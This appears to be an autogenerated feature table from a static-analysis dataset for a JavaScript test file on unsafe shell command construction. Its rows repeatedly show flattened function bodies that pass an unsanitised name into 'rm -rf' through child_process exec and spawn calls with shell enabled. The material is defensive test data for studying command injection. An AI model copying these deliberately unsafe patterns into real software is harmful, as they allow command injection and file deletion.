autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:9 | arr.push | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:9 | arr.push | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:9 | arr.push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | arr.push(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | arr.push(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | arr.push(name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | arr.push(name) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | arr.push(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | exceptional return of arr.push(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | exceptional return of arr.push(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | exceptional return of arr.push(name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | exceptional return of arr.push(name) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | exceptional return of arr.push(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:6:426:9 | push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:6:426:9 | push | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:6:426:9 | push | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:6:426:9 | push | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:6:426:9 | push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | CalleeFlexibleAccessPath | arr.push | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:11:426:14 | name | receiverName | arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:6 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:6 | spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:6 | spawn | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:6 | spawn | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:6 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | exceptional return of spawn(" ... WN_OPT) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | exceptional return of spawn(" ... WN_OPT) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | exceptional return of spawn(" ... WN_OPT) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | exceptional return of spawn(" ... WN_OPT) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | exceptional return of spawn(" ... WN_OPT) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:8:427:11 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:14:427:16 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:19:427:27 | SPAWN_OPT | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:6 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:6 | spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:6 | spawn | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:6 | spawn | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:6 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | exceptional return of spawn(" ... WN_OPT) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | exceptional return of spawn(" ... WN_OPT) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | exceptional return of spawn(" ... WN_OPT) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | exceptional return of spawn(" ... WN_OPT) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | exceptional return of spawn(" ... WN_OPT) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 